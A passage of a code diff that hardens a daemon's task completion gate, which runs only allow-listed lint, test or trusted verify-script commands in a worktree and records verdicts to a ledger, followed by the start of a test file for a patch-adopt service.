+ * when a signal killed it); `unavailable` means the process never started at
+ * all — ENOENT, EACCES — which is a SKIP, not a failure.
+ */
+export type GateExit = { kind: 'exited'; code: number | null } | { kind: 'unavailable'; message: string };
+
 /** A running child, reduced to what the runner needs. The default
  *  implementation wraps `child_process.spawn`; tests inject a fake. */
 export interface GateProcess {
   /** Combined stdout+stderr, chunk by chunk. */
   onOutput(cb: (chunk: string) => void): void;
-  /** Resolves with the exit code, or `null` when the child died on a signal. */
-  wait(): Promise<number | null>;
+  /** How the step ended — see GateExit. */
+  wait(): Promise<GateExit>;
   /** Kill the whole process group (a test runner spawns children of its own). */
   kill(): void;
 }
@@ -134,7 +161,7 @@ export interface TaskGateRunnerOptions {
 
 // ── Results ──────────────────────────────────────────────────────────────────
 
-export type GateSkipReason = 'deps_missing' | 'no_gate_command';
+export type GateSkipReason = 'deps_missing' | 'no_gate_command' | 'gate_unavailable';
 
 export type GateRunResult =
   /** The gate ran to a verdict. `result.exitCode === 0` is the only pass. */
@@ -151,6 +178,20 @@ export interface GateRunInput {
   worktreePath: string;
   /** The daemon's own workspace id — the gate is a `system` write. */
   systemWorkspaceId: string;
+  /**
+   * The PARENT repository root, for the wmux.json trust lookup.
+   *
+   * Trust records are keyed by the path the user approved, which is the repo
+   * they opened — never a `wtask/…` worktree the daemon created minutes ago and
+   * that no dialog has ever named. Looking the verdict up under the worktree
+   * path therefore always answered `untrusted`, which made the entire
+   * project-verify branch dead code. The config is READ from the parent root;
+   * the script still RUNS in the worktree.
+   *
+   * Omitted (tests, an unresolvable parent) ⇒ the worktree path, i.e. the old
+   * behaviour: no verdict, npm only.
+   */
+  projectRoot?: string;
 }
 
 // ── Tail bounding ────────────────────────────────────────────────────────────
@@ -183,6 +224,12 @@ const defaultSpawn: GateSpawn = (cmd, args, opts) => {
     // Own process group so a cancel/timeout kills the test runner's children
     // too, not just the npm wrapper that would otherwise be orphaned.
     detached: process.platform !== 'win32',
+    // win32 only: `npm.cmd` is a batch file, and current Node refuses to spawn
+    // one without a shell (EINVAL, the CVE-2024-27980 fix). The argv stays an
+    // ARRAY — Node quotes each element for cmd.exe — and every element here is
+    // a constant from allowedGateArgv() plus a server-derived path, so there is
+    // still no caller string being interpolated into a command line.
+    ...(process.platform === 'win32' ? { shell: true } : {}),
     stdio: ['ignore', 'pipe', 'pipe'],
   });
   return {
@@ -191,9 +238,15 @@ const defaultSpawn: GateSpawn = (cmd, args, opts) => {
       child.stderr?.on('data', (d: Buffer) => cb(d.toString('utf8')));
     },
     wait() {
-      return new Promise<number | null>((resolve) => {
-        child.once('error', () => resolve(null));
-        child.once('close', (code: number | null) => resolve(code));
+      return new Promise<GateExit>((resolve) => {
+        // An `error` event is the process never having RUN — npm not on PATH,
+        // the script not executable. That is not a failing gate, and reporting
+        // it as one (exitCode null) had a brain mark a healthy task failed
+        // because the daemon's PATH was short.
+        child.once('error', (err: NodeJS.ErrnoException) =>
+          resolve({ kind: 'unavailable', message: err.message }),
+        );
+        child.once('close', (code: number | null) => resolve({ kind: 'exited', code }));
       });
     },
     kill() {
@@ -256,7 +309,13 @@ export class TaskGateRunner {
     this.ledger = opts.ledger;
     this.project = opts.project;
     this.spawn = opts.spawn ?? defaultSpawn;
-    this.timeoutMs = opts.timeoutMs ?? GATE_TIMEOUT_MS;
+    // Clamped, never disabled. A `0` (or a negative) used to mean "no timer",
+    // which is indistinguishable from "hangs forever holding this task's gate
+    // slot" — and the slot is exclusive, so one wedged gate would make every
+    // later run on that task answer `busy` until the daemon restarts. Tests
+    // that want a short deadline pass a small positive number.
+    this.timeoutMs =
+      typeof opts.timeoutMs === 'number' && opts.timeoutMs > 0 ? opts.timeoutMs : GATE_TIMEOUT_MS;
     this.now = opts.now ?? Date.now;
     this.readPackageScripts = opts.readPackageScripts ?? defaultReadPackageScripts;
     this.depsState = opts.depsState ?? defaultDepsState;
@@ -284,8 +343,11 @@ export class TaskGateRunner {
    */
   async resolveSteps(
     worktreePath: string,
+    configRoot: string = worktreePath,
   ): Promise<{ steps: GateStep[] } | { refused: string }> {
-    const declared = await this.declaredVerifyCommand(worktreePath);
+    // The verdict is read at the PARENT root (that is where the user approved a
+    // wmux.json); the script runs in the worktree.
+    const declared = await this.declaredVerifyCommand(configRoot);
     if (declared !== null) {
       if (!VERIFY_COMMAND_SPELLINGS.includes(declared)) {
         return {
@@ -313,11 +375,11 @@ export class TaskGateRunner {
 
   /** The trusted project's `verify` command string, or null when there is none
    *  (no config, not trusted, or no such command). */
-  private async declaredVerifyCommand(worktreePath: string): Promise<string | null> {
+  private async declaredVerifyCommand(configRoot: string): Promise<string | null> {
     if (!this.project) return null;
     let state: { trust?: string; config?: { commands?: { id: string; command: string }[] } };
     try {
-      state = await this.project.getState(worktreePath);
+      state = await this.project.getState(configRoot);
     } catch {
       return null;
     }
@@ -330,45 +392,57 @@ export class TaskGateRunner {
 
   async run(input: GateRunInput): Promise<GateRunResult> {
     const { taskId, worktreePath } = input;
+
+    // ── Claim the slot in the SAME TICK the check happens ────────────────
+    // The check used to sit before two awaits (depsState, resolveSteps) and the
+    // claim after them, so two concurrent runs both saw an empty map, both
+    // spawned, the second overwrote the first's cancel closure — leaving one
+    // gate uncancellable — and the first to finish deleted the OTHER one's
+    // entry, after which a third call started a third npm on the same
+    // node_modules. A placeholder token closes that window: it is inserted
+    // synchronously, removed on every early-return path, and `finally` deletes
+    // it only if the entry is still the token this call inserted.
     if (this.active.has(taskId)) return { ok: false, status: 'busy', taskId };
-
-    const deps = this.depsState(worktreePath);
-    if (deps !== 'ok') {
-      return {
-        ok: true,
-        status: 'skipped',
-        taskId,
-        skipped: 'deps_missing',
-        detail:
-          deps === 'missing'
-            ? 'node_modules is missing in the task worktree — run npm ci there, then re-run the gate'
-            : 'node_modules in the task worktree is a symlink, which makes lint/test results meaningless — run a real npm ci there',
-      };
-    }
-
-    const resolved = await this.resolveSteps(worktreePath);
-    if ('refused' in resolved) return { ok: false, status: 'refused', taskId, error: resolved.refused };
-    if (resolved.steps.length === 0) {
-      return {
-        ok: true,
-        status: 'skipped',
-        taskId,
-        skipped: 'no_gate_command',
-        detail: 'this project declares no verify script and no npm lint/test scripts, so there is no gate to run',
-      };
-    }
-
-    // Claimed synchronously with respect to the awaits above: everything that
-    // could reject has already run, so from here a concurrent call is `busy`.
     let cancelled = false;
     let current: GateProcess | null = null;
-    const cancel = (): void => {
-      cancelled = true;
-      current?.kill();
+    const token: ActiveGate = {
+      cancel: (): void => {
+        cancelled = true;
+        current?.kill();
+      },
     };
-    this.active.set(taskId, { cancel });
+    this.active.set(taskId, token);
+    const release = (): void => {
+      if (this.active.get(taskId) === token) this.active.delete(taskId);
+    };
 
     try {
+      const deps = this.depsState(worktreePath);
+      if (deps !== 'ok') {
+        return {
+          ok: true,
+          status: 'skipped',
+          taskId,
+          skipped: 'deps_missing',
+          detail:
+            deps === 'missing'
+              ? 'node_modules is missing in the task worktree — run npm ci there, then re-run the gate'
+              : 'node_modules in the task worktree is a symlink, which makes lint/test results meaningless — run a real npm ci there',
+        };
+      }
+
+      const resolved = await this.resolveSteps(worktreePath, input.projectRoot ?? worktreePath);
+      if ('refused' in resolved) return { ok: false, status: 'refused', taskId, error: resolved.refused };
+      if (resolved.steps.length === 0) {
+        return {
+          ok: true,
+          status: 'skipped',
+          taskId,
+          skipped: 'no_gate_command',
+          detail: 'this project declares no verify script and no npm lint/test scripts, so there is no gate to run',
+        };
+      }
+
       let output = '';
       const append = (chunk: string): void => {
         output += chunk;
@@ -381,32 +455,46 @@ export class TaskGateRunner {
       let exitCode: number | null = 0;
       let label = resolved.steps[resolved.steps.length - 1]?.label ?? '';
 
-      for (const s of resolved.steps) {
+      for (const step of resolved.steps) {
         if (cancelled) {
           exitCode = null;
-          label = s.label;
+          label = step.label;
           break;
         }
-        label = s.label;
-        const [cmd, ...args] = s.argv;
+        label = step.label;
+        const [cmd, ...args] = step.argv;
         const proc = this.spawn(cmd as string, args, { cwd: worktreePath });
         current = proc;
         proc.onOutput(append);
 
-        let timer: ReturnType<typeof setTimeout> | undefined;
         let timedOut = false;
-        if (this.timeoutMs > 0) {
-          timer = setTimeout(() => {
-            timedOut = true;
-            proc.kill();
-          }, this.timeoutMs);
-        }
+        const timer = setTimeout(() => {
+          timedOut = true;
+          proc.kill();
+        }, this.timeoutMs);
+        let exit: GateExit;
         try {
-          exitCode = await proc.wait();
+          exit = await proc.wait();
         } finally {
-          if (timer) clearTimeout(timer);
+          clearTimeout(timer);
           current = null;
         }
+
+        // The process never ran (ENOENT: npm is not on the daemon's PATH;
+        // EACCES: verify.sh is not executable). Nothing was graded, so this is
+        // a SKIP — reporting it as exitCode null would have a brain close a
+        // healthy task as failed because of the daemon's environment.
+        if (exit.kind === 'unavailable') {
+          return {
+            ok: true,
+            status: 'skipped',
+            taskId,
+            skipped: 'gate_unavailable',
+            detail: `the gate command could not be started (${step.label}): ${exit.message}`,
+          };
+        }
+        exitCode = exit.code;
+
         if (timedOut || cancelled) {
           // A killed gate reports `null` whatever the platform turned the signal
           // into — the ledger's rule is that only an explicit 0 passes.
@@ -432,7 +520,7 @@ export class TaskGateRunner {
       const recorded = await this.record(taskId, input.systemWorkspaceId, result);
       return { ok: true, status: 'completed', taskId, result, recorded };
     } finally {
-      this.active.delete(taskId);
+      release();
     }
   }
 

--- a/src/main/worktask/TaskGateRunner.ts
+++ b/src/main/worktask/TaskGateRunner.ts
@@ -1,0 +1,466 @@
+// ─── TaskGateRunner — the completion gate a task must pass, run by the daemon ─
+//
+// Before this, "did the task's work actually build?" was something only a human
+// could answer: the brain could type `npm test` into a pane and then read a
+// terminal screen. Screens are not receipts. This runner executes a FIXED,
+// allow-listed command set inside the task's own worktree and writes one
+// structured verdict into the task ledger, so `completed` means a gate passed
+// rather than a worker having said so.
+//
+// What it is NOT: a shell. There is no caller-supplied command anywhere in this
+// file. The only three argv arrays it will ever spawn are ALLOWED_GATE_ARGV
+// below, chosen by the runner from what the project itself declares:
+//
+//   1. `scripts/verify.sh` — ONLY when the project's `wmux.json` is currently
+//      TRUSTED (ProjectConfigStore verdict, i.e. the user approved these exact
+//      bytes) and declares the well-known command id `verify`. The declared
+//      command STRING is not executed: it is compared against the allow-list,
+//      and anything else is a refusal rather than a fallback, so a project that
+//      believes it declared its own gate is never silently graded by another.
+//   2. otherwise `npm run lint`, then `npm test` — each only if package.json
+//      actually declares that script. Sequential, first failure stops.
+//
+// `node_modules` missing (or a symlink, which is how worktrees in this repo get
+// a false `npm test` failure) is reported as `skipped: 'deps_missing'`, never as
+// a failing gate: "the gate did not run" and "the code is broken" are different
+// facts and a brain that cannot tell them apart will close a healthy task as
+// failed.
+//
+// Ledger writes go through LedgerPort (see ledgerPort.ts) as a `system` actor —
+// the daemon ran the gate, not the worker whose code it graded — and a ledger
+// that is unreachable does not fail the gate: the run happened, only its receipt
+// is missing, and the result is returned to the caller either way.
+
+import * as fs from 'node:fs';
+import * as path from 'node:path';
+import { spawn as nodeSpawn } from 'node:child_process';
+import { getExecEnv } from '../../shared/execEnv';
+import { LEDGER_GATE_TAIL_MAX_BYTES, type LedgerGateResult } from '../../shared/ledger';
+import type { LedgerPort } from './ledgerPort';
+
+/** 15 minutes. A gate is a lint+test run, not a build farm; past this the
+ *  process group is killed and the result is a signal death (exitCode null),
+ *  which the ledger contract already defines as a failure. */
+export const GATE_TIMEOUT_MS = 15 * 60 * 1000;
+
+/** How many trailing lines of combined output the verdict carries. Bounded
+ *  again in BYTES by LEDGER_GATE_TAIL_MAX_BYTES — 40 lines of minified output
+ *  can be megabytes. */
+export const GATE_TAIL_LINES = 40;
+
+/** The well-known `wmux.json` command id that opts a project into its own gate.
+ *  Fixed on purpose: a project declares THAT it has a verify script, it does not
+ *  get to say what runs. */
+export const GATE_PROJECT_COMMAND_ID = 'verify';
+
+/** Path, relative to the worktree root, of the only project-declared gate this
+ *  runner will execute. */
+export const GATE_VERIFY_SCRIPT = 'scripts/verify.sh';
+
+/** The spellings of GATE_VERIFY_SCRIPT a wmux.json may use for its `verify`
+ *  command. Compared literally; anything else is refused. */
+const VERIFY_COMMAND_SPELLINGS: readonly string[] = [
+  'scripts/verify.sh',
+  './scripts/verify.sh',
+  'bash scripts/verify.sh',
+  'bash ./scripts/verify.sh',
+  'sh scripts/verify.sh',
+  'sh ./scripts/verify.sh',
+];
+
+/** One allow-listed step: a program plus a fixed argv. Never assembled from
+ *  caller input, never passed through a shell. */
+export interface GateStep {
+  readonly argv: readonly string[];
+  /** Human/ledger label — exactly the argv, joined. */
+  readonly label: string;
+}
+
+const npmBin = (): string => (process.platform === 'win32' ? 'npm.cmd' : 'npm');
+
+function step(argv: string[]): GateStep {
+  return { argv, label: argv.join(' ') };
+}
+
+/** Every argv shape this runner may ever spawn, as a function of the worktree.
+ *  Exported so a test can assert the set has not grown. */
+export function allowedGateArgv(worktreePath: string): readonly (readonly string[])[] {
+  return [
+    ['bash', path.join(worktreePath, GATE_VERIFY_SCRIPT)],
+    [npmBin(), 'run', 'lint'],
+    [npmBin(), 'test'],
+  ];
+}
+
+// ── Injected seams ───────────────────────────────────────────────────────────
+
+/** A running child, reduced to what the runner needs. The default
+ *  implementation wraps `child_process.spawn`; tests inject a fake. */
+export interface GateProcess {
+  /** Combined stdout+stderr, chunk by chunk. */
+  onOutput(cb: (chunk: string) => void): void;
+  /** Resolves with the exit code, or `null` when the child died on a signal. */
+  wait(): Promise<number | null>;
+  /** Kill the whole process group (a test runner spawns children of its own). */
+  kill(): void;
+}
+
+export type GateSpawn = (cmd: string, args: readonly string[], opts: { cwd: string }) => GateProcess;
+
+/** The `wmux.json` facts the runner needs: is it trusted, and does it declare
+ *  the well-known verify command. Structurally satisfied by
+ *  `ProjectConfigStore.getState`. */
+export interface ProjectGatePort {
+  getState(cwd: string): Promise<{
+    trust?: string;
+    config?: { commands?: { id: string; command: string }[] };
+  }>;
+}
+
+export interface TaskGateRunnerOptions {
+  ledger: LedgerPort;
+  /** Absent = no project config consulted; the runner then uses npm only. */
+  project?: ProjectGatePort;
+  spawn?: GateSpawn;
+  timeoutMs?: number;
+  now?: () => number;
+  /** Injected for tests; defaults to reading `<worktree>/package.json`. */
+  readPackageScripts?: (worktreePath: string) => Record<string, string>;
+  /** Injected for tests; defaults to an lstat of `<worktree>/node_modules`. */
+  depsState?: (worktreePath: string) => 'ok' | 'missing' | 'symlink';
+  /** Injected for tests; defaults to fs.existsSync. */
+  fileExists?: (p: string) => boolean;
+}
+
+// ── Results ──────────────────────────────────────────────────────────────────
+
+export type GateSkipReason = 'deps_missing' | 'no_gate_command';
+
+export type GateRunResult =
+  /** The gate ran to a verdict. `result.exitCode === 0` is the only pass. */
+  | { ok: true; status: 'completed'; taskId: string; result: LedgerGateResult; recorded: boolean }
+  /** Nothing ran, and that is not a failure. */
+  | { ok: true; status: 'skipped'; taskId: string; skipped: GateSkipReason; detail: string }
+  /** A gate for this task is already running. */
+  | { ok: false; status: 'busy'; taskId: string }
+  /** The project declared a gate this runner will not execute. */
+  | { ok: false; status: 'refused'; taskId: string; error: string };
+
+export interface GateRunInput {
+  taskId: string;
+  worktreePath: string;
+  /** The daemon's own workspace id — the gate is a `system` write. */
+  systemWorkspaceId: string;
+}
+
+// ── Tail bounding ────────────────────────────────────────────────────────────
+
+/**
+ * Last GATE_TAIL_LINES lines, then bounded to LEDGER_GATE_TAIL_MAX_BYTES by
+ * dropping from the FRONT — the end of a failing run is the part that says why.
+ * The result is untrusted text (see the ledger constant): it is whatever the
+ * gate printed, and the gate runs code a worker wrote.
+ */
+export function boundTail(raw: string): string {
+  const lines = raw.split('\n');
+  const tail = lines.slice(Math.max(0, lines.length - GATE_TAIL_LINES)).join('\n');
+  const buf = Buffer.from(tail, 'utf8');
+  if (buf.byteLength <= LEDGER_GATE_TAIL_MAX_BYTES) return tail;
+  let cut = buf.subarray(buf.byteLength - LEDGER_GATE_TAIL_MAX_BYTES).toString('utf8');
+  // A front cut can land mid-codepoint; drop the replacement char rather than
+  // start the tail with a corrupted character.
+  if (cut.startsWith('�')) cut = cut.slice(1);
+  return cut;
+}
+
+// ── Default seam implementations ─────────────────────────────────────────────
+
+const defaultSpawn: GateSpawn = (cmd, args, opts) => {
+  const child = nodeSpawn(cmd, [...args], {
+    cwd: opts.cwd,
+    env: getExecEnv(),
+    windowsHide: true,
+    // Own process group so a cancel/timeout kills the test runner's children
+    // too, not just the npm wrapper that would otherwise be orphaned.
+    detached: process.platform !== 'win32',
+    stdio: ['ignore', 'pipe', 'pipe'],
+  });
+  return {
+    onOutput(cb) {
+      child.stdout?.on('data', (d: Buffer) => cb(d.toString('utf8')));
+      child.stderr?.on('data', (d: Buffer) => cb(d.toString('utf8')));
+    },
+    wait() {
+      return new Promise<number | null>((resolve) => {
+        child.once('error', () => resolve(null));
+        child.once('close', (code: number | null) => resolve(code));
+      });
+    },
+    kill() {
+      try {
+        if (process.platform !== 'win32' && typeof child.pid === 'number') {
+          process.kill(-child.pid, 'SIGKILL');
+        } else {
+          child.kill('SIGKILL');
+        }
+      } catch {
+        // Already gone.
+      }
+    },
+  };
+};
+
+function defaultDepsState(worktreePath: string): 'ok' | 'missing' | 'symlink' {
+  try {
+    const st = fs.lstatSync(path.join(worktreePath, 'node_modules'));
+    return st.isSymbolicLink() ? 'symlink' : 'ok';
+  } catch {
+    return 'missing';
+  }
+}
+
+function defaultReadPackageScripts(worktreePath: string): Record<string, string> {
+  try {
+    const raw = fs.readFileSync(path.join(worktreePath, 'package.json'), 'utf8');
+    const parsed = JSON.parse(raw) as { scripts?: Record<string, unknown> };
+    const out: Record<string, string> = {};
+    for (const [k, v] of Object.entries(parsed.scripts ?? {})) {
+      if (typeof v === 'string') out[k] = v;
+    }
+    return out;
+  } catch {
+    return {};
+  }
+}
+
+// ── The runner ───────────────────────────────────────────────────────────────
+
+interface ActiveGate {
+  cancel: () => void;
+}
+
+export class TaskGateRunner {
+  private readonly ledger: LedgerPort;
+  private readonly project: ProjectGatePort | undefined;
+  private readonly spawn: GateSpawn;
+  private readonly timeoutMs: number;
+  private readonly now: () => number;
+  private readonly readPackageScripts: (worktreePath: string) => Record<string, string>;
+  private readonly depsState: (worktreePath: string) => 'ok' | 'missing' | 'symlink';
+  private readonly fileExists: (p: string) => boolean;
+  /** One gate per task — the second concurrent call is `busy`, not a second
+   *  npm install fighting the first over the same node_modules. */
+  private readonly active = new Map<string, ActiveGate>();
+
+  constructor(opts: TaskGateRunnerOptions) {
+    this.ledger = opts.ledger;
+    this.project = opts.project;
+    this.spawn = opts.spawn ?? defaultSpawn;
+    this.timeoutMs = opts.timeoutMs ?? GATE_TIMEOUT_MS;
+    this.now = opts.now ?? Date.now;
+    this.readPackageScripts = opts.readPackageScripts ?? defaultReadPackageScripts;
+    this.depsState = opts.depsState ?? defaultDepsState;
+    this.fileExists = opts.fileExists ?? ((p) => fs.existsSync(p));
+  }
+
+  isRunning(taskId: string): boolean {
+    return this.active.has(taskId);
+  }
+
+  /** Kill a running gate's process group. Returns false when nothing was
+   *  running — cancelling twice is not an error. */
+  cancel(taskId: string): boolean {
+    const gate = this.active.get(taskId);
+    if (!gate) return false;
+    gate.cancel();
+    return true;
+  }
+
+  /**
+   * Resolve the steps for a worktree. Exported behaviour, tested directly:
+   * a trusted project declaring the well-known id wins; anything else it
+   * declares under that id is a refusal; otherwise npm, filtered by the scripts
+   * package.json actually has.
+   */
+  async resolveSteps(
+    worktreePath: string,
+  ): Promise<{ steps: GateStep[] } | { refused: string }> {
+    const declared = await this.declaredVerifyCommand(worktreePath);
+    if (declared !== null) {
+      if (!VERIFY_COMMAND_SPELLINGS.includes(declared)) {
+        return {
+          refused:
+            `this project's wmux.json declares '${GATE_PROJECT_COMMAND_ID}' as a command the gate runner will not execute; ` +
+            `the gate runs ${GATE_VERIFY_SCRIPT} or npm run lint + npm test, never an arbitrary command`,
+        };
+      }
+      const scriptPath = path.join(worktreePath, GATE_VERIFY_SCRIPT);
+      if (this.fileExists(scriptPath)) return { steps: [step(['bash', scriptPath])] };
+      // Declared and trusted, but this worktree does not have the file. Falling
+      // through to npm would grade the task by a gate the project did not
+      // choose, so say so instead.
+      return {
+        refused: `this project declares ${GATE_VERIFY_SCRIPT} as its gate, but that file is not in the task worktree`,
+      };
+    }
+
+    const scripts = this.readPackageScripts(worktreePath);
+    const steps: GateStep[] = [];
+    if (typeof scripts['lint'] === 'string') steps.push(step([npmBin(), 'run', 'lint']));
+    if (typeof scripts['test'] === 'string') steps.push(step([npmBin(), 'test']));
+    return { steps };
+  }
+
+  /** The trusted project's `verify` command string, or null when there is none
+   *  (no config, not trusted, or no such command). */
+  private async declaredVerifyCommand(worktreePath: string): Promise<string | null> {
+    if (!this.project) return null;
+    let state: { trust?: string; config?: { commands?: { id: string; command: string }[] } };
+    try {
+      state = await this.project.getState(worktreePath);
+    } catch {
+      return null;
+    }
+    // 'untrusted' / 'stale' / 'denied' all mean the user has not approved THESE
+    // bytes, and an unapproved wmux.json chooses nothing.
+    if (state?.trust !== 'trusted') return null;
+    const cmd = (state.config?.commands ?? []).find((c) => c.id === GATE_PROJECT_COMMAND_ID);
+    return cmd ? cmd.command.trim() : null;
+  }
+
+  async run(input: GateRunInput): Promise<GateRunResult> {
+    const { taskId, worktreePath } = input;
+    if (this.active.has(taskId)) return { ok: false, status: 'busy', taskId };
+
+    const deps = this.depsState(worktreePath);
+    if (deps !== 'ok') {
+      return {
+        ok: true,
+        status: 'skipped',
+        taskId,
+        skipped: 'deps_missing',
+        detail:
+          deps === 'missing'
+            ? 'node_modules is missing in the task worktree — run npm ci there, then re-run the gate'
+            : 'node_modules in the task worktree is a symlink, which makes lint/test results meaningless — run a real npm ci there',
+      };
+    }
+
+    const resolved = await this.resolveSteps(worktreePath);
+    if ('refused' in resolved) return { ok: false, status: 'refused', taskId, error: resolved.refused };
+    if (resolved.steps.length === 0) {
+      return {
+        ok: true,
+        status: 'skipped',
+        taskId,
+        skipped: 'no_gate_command',
+        detail: 'this project declares no verify script and no npm lint/test scripts, so there is no gate to run',
+      };
+    }
+
+    // Claimed synchronously with respect to the awaits above: everything that
+    // could reject has already run, so from here a concurrent call is `busy`.
+    let cancelled = false;
+    let current: GateProcess | null = null;
+    const cancel = (): void => {
+      cancelled = true;
+      current?.kill();
+    };
+    this.active.set(taskId, { cancel });
+
+    try {
+      let output = '';
+      const append = (chunk: string): void => {
+        output += chunk;
+        // Keep the in-memory buffer bounded: a runaway test can print gigabytes
+        // and only the tail ever reaches the ledger.
+        const cap = LEDGER_GATE_TAIL_MAX_BYTES * 4;
+        if (output.length > cap) output = output.slice(output.length - cap);
+      };
+
+      let exitCode: number | null = 0;
+      let label = resolved.steps[resolved.steps.length - 1]?.label ?? '';
+
+      for (const s of resolved.steps) {
+        if (cancelled) {
+          exitCode = null;
+          label = s.label;
+          break;
+        }
+        label = s.label;
+        const [cmd, ...args] = s.argv;
+        const proc = this.spawn(cmd as string, args, { cwd: worktreePath });
+        current = proc;
+        proc.onOutput(append);
+
+        let timer: ReturnType<typeof setTimeout> | undefined;
+        let timedOut = false;
+        if (this.timeoutMs > 0) {
+          timer = setTimeout(() => {
+            timedOut = true;
+            proc.kill();
+          }, this.timeoutMs);
+        }
+        try {
+          exitCode = await proc.wait();
+        } finally {
+          if (timer) clearTimeout(timer);
+          current = null;
+        }
+        if (timedOut || cancelled) {
+          // A killed gate reports `null` whatever the platform turned the signal
+          // into — the ledger's rule is that only an explicit 0 passes.
+          exitCode = null;
+          append(
+            timedOut
+              ? `\n[gate] timed out after ${Math.round(this.timeoutMs / 1000)}s and was killed\n`
+              : '\n[gate] cancelled\n',
+          );
+          break;
+        }
+        // First failure stops: `npm test` after a failing lint tells nobody
+        // anything they did not already know.
+        if (exitCode !== 0) break;
+      }
+
+      const result: LedgerGateResult = {
+        exitCode,
+        tail: boundTail(output),
+        at: this.now(),
+        command: label,
+      };
+      const recorded = await this.record(taskId, input.systemWorkspaceId, result);
+      return { ok: true, status: 'completed', taskId, result, recorded };
+    } finally {
+      this.active.delete(taskId);
+    }
+  }
+
+  /** Compare-and-swap write of the verdict. A ledger that is missing or
+   *  unreachable is reported (`recorded: false`) and never turned into a gate
+   *  failure — the gate ran; only its receipt is missing. */
+  private async record(taskId: string, systemWorkspaceId: string, gate: LedgerGateResult): Promise<boolean> {
+    const snapshot = await this.ledger.read(taskId);
+    if (!snapshot) return false;
+    const res = await this.ledger.writeGate({
+      taskId,
+      expectedRev: snapshot.rev,
+      actor: { kind: 'system', workspaceId: systemWorkspaceId },
+      gate,
+    });
+    if (res.ok) return true;
+    if (res.reason !== 'conflict') return false;
+    // One retry on a lost race: re-read and write against the revision that
+    // won. A second conflict means the entry is genuinely contended and the
+    // caller still gets the verdict in the response.
+    const again = await this.ledger.read(taskId);
+    if (!again) return false;
+    const retry = await this.ledger.writeGate({
+      taskId,
+      expectedRev: again.rev,
+      actor: { kind: 'system', workspaceId: systemWorkspaceId },
+      gate,
+    });
+    return retry.ok;
+  }
+}

--- a/src/main/worktask/__tests__/TaskAdoptService.test.ts
+++ b/src/main/worktask/__tests__/TaskAdoptService.test.ts
@@ -1,0 +1,120 @@
+// ─── TaskAdoptService — all-or-nothing adopt, with git injected ──────────────
+//
+// The target repository is DERIVED, the target must be clean, and the patch is
+// taken against the parent's own HEAD. Each of those is a refusal path, and the
+// refusals are the point: adopting onto uncommitted work is not recoverable.
+
+import { describe, it, expect, vi } from 'vitest';
+
+import { TaskAdoptService, type AdoptGit } from '../TaskAdoptService';
+
+const WT = '/wt/lane-one';
+const REPO = '/repo';
+
+/** A git that answers by subcommand; `status` and `diff` are the knobs. */
+function fakeGit(opts: {
+  status?: string;
+  diff?: string;
+  applyCode?: number;
+  seen?: string[][];
+}): AdoptGit {
+  return async (args, cwd) => {
+    opts.seen?.push([cwd, ...args]);
+    const ok = (stdout: string) => ({ stdout, stderr: '', code: 0 });
+    if (args[0] === 'rev-parse' && args.includes('--git-common-dir')) return ok(`${REPO}/.git\n`);
+    if (args[0] === 'rev-parse' && args.includes('--show-toplevel')) return ok(`${REPO}\n`);
+    if (args[0] === 'rev-parse' && args[1] === 'HEAD') return ok('abc123\n');
+    if (args[0] === 'status') return ok(opts.status ?? '');
+    if (args[0] === 'add') return ok('');
+    if (args[0] === 'diff' && args.includes('--name-only')) return ok(opts.diff ? 'src/a.ts\nsrc/b.ts\n' : '');
+    if (args[0] === 'diff') return ok(opts.diff ?? '');
+    if (args[0] === 'apply') {
+      return opts.applyCode === 0 || opts.applyCode === undefined
+        ? ok('')
+        : { stdout: '', stderr: 'patch does not apply', code: 1 };
+    }
+    throw new Error(`unexpected git ${args.join(' ')}`);
+  };
+}
+
+function service(git: AdoptGit): { svc: TaskAdoptService; written: string[] } {
+  const written: string[] = [];
+  const svc = new TaskAdoptService({
+    git,
+    writePatch: (p) => {
+      written.push(p);
+      return '/tmp/patch';
+    },
+    removePatch: vi.fn(),
+  });
+  return { svc, written };
+}
+
+describe('TaskAdoptService', () => {
+  it('applies the task diff into the derived parent repository, unstaged', async () => {
+    const seen: string[][] = [];
+    const { svc, written } = service(fakeGit({ diff: 'diff --git a/src/a.ts\n', seen }));
+    const res = await svc.adopt({ taskId: 'wtask-1', worktreePath: WT });
+
+    expect(res).toMatchObject({ ok: true, targetRepo: REPO, files: ['src/a.ts', 'src/b.ts'] });
+    expect(written).toEqual(['diff --git a/src/a.ts\n']);
+    const apply = seen.find((c) => c[1] === 'apply');
+    expect(apply?.[0]).toBe(REPO);
+    expect(apply).toContain('--3way');
+    // Unstaged on purpose — adopting is not committing.
+    expect(apply).not.toContain('--index');
+  });
+
+  it('takes the patch against the parent HEAD, from inside the task worktree', async () => {
+    const seen: string[][] = [];
+    const { svc } = service(fakeGit({ diff: 'patch', seen }));
+    await svc.adopt({ taskId: 'wtask-1', worktreePath: WT });
+    const diff = seen.find((c) => c[1] === 'diff' && c.includes('--binary'));
+    expect(diff?.[0]).toBe(WT);
+    expect(diff).toContain('abc123');
+  });
+
+  it('refuses when the parent repository has uncommitted changes', async () => {
+    const { svc, written } = service(fakeGit({ status: ' M src/x.ts\n', diff: 'patch' }));
+    const res = await svc.adopt({ taskId: 'wtask-1', worktreePath: WT });
+    expect(res).toMatchObject({ ok: false, reason: 'dirty-target' });
+    expect(written).toEqual([]);
+  });
+
+  it('refuses when the task has produced nothing', async () => {
+    const { svc } = service(fakeGit({ diff: '' }));
+    expect(await svc.adopt({ taskId: 'wtask-1', worktreePath: WT })).toMatchObject({ ok: false, reason: 'empty' });
+  });
+
+  it('reports a patch that does not apply rather than claiming success', async () => {
+    const { svc } = service(fakeGit({ diff: 'patch', applyCode: 1 }));
+    const res = await svc.adopt({ taskId: 'wtask-1', worktreePath: WT });
+    expect(res).toMatchObject({ ok: false, reason: 'apply-failed' });
+    if (res.ok) throw new Error('unreachable');
+    expect(res.error).toContain('did not apply cleanly');
+  });
+
+  it('refuses a task that is the main checkout, not a worktree of it', async () => {
+    const git: AdoptGit = async (args) => {
+      if (args[0] === 'rev-parse' && args.includes('--git-common-dir')) return { stdout: `${WT}/.git\n`, stderr: '', code: 0 };
+      if (args[0] === 'rev-parse' && args.includes('--show-toplevel')) return { stdout: `${WT}\n`, stderr: '', code: 0 };
+      throw new Error(`unexpected git ${args.join(' ')}`);
+    };
+    const { svc } = service(git);
+    expect(await svc.adopt({ taskId: 'wtask-1', worktreePath: WT })).toMatchObject({
+      ok: false,
+      reason: 'not-a-task-worktree',
+    });
+  });
+
+  it('always removes the temp patch, including after a failed apply', async () => {
+    const removePatch = vi.fn();
+    const svc = new TaskAdoptService({
+      git: fakeGit({ diff: 'patch', applyCode: 1 }),
